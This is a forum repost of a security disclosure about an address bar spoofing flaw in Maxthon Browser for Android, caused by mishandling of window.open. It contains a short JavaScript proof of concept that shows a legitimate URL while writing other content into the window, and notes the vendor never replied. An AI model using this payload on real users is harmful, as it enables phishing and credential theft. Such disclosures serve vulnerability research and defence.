Jump to content
Aerosol

Maxthon Browser Address Bar Spoofing

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Product: Maxthon Browser
#Vulnerability: Address Bar Spoofing Vulnerability
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAinfoSEC
#Website: http://rafayhackingarticles.net

*Introduction*

Maxthon browser for Android was prone to an "Address Bar Spoofing"
vulnerability wdue to mishandling of javaScript's window.open function
which is used to open a secondary browser window. This could be exploited
by tricking the users into supplying senstive information such as
username/passwords etc due to the fact that the address bar would display a
legitimate URL, however it would be hosted on the attacker's page.

*POC*

Following is the POC that could be used to reproduce the issue:

<script> document.getElementById('one').onclick = function() {
myWindow=window.open('http://rafayhackingarticles.net/','RHA','width=300,height=300,location=yes');
myWindow.document.write("<html><head></head><body><b>This page is still
being hosted another domain, however the domain is pointing to
rafayhackingarticles.net.</b><br><br><iframe src=\"
http://www.rafayhackingarticles.net/\");></iframe></scri+pt></body></html>");
myWindow.focus(); return false; } </script>


*impact*

The issue could be abused to carry out more effective phishing attacks
against it's users.

*Fix*

We tried to contact the vendor several times however we did not recieve any
response

Source

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...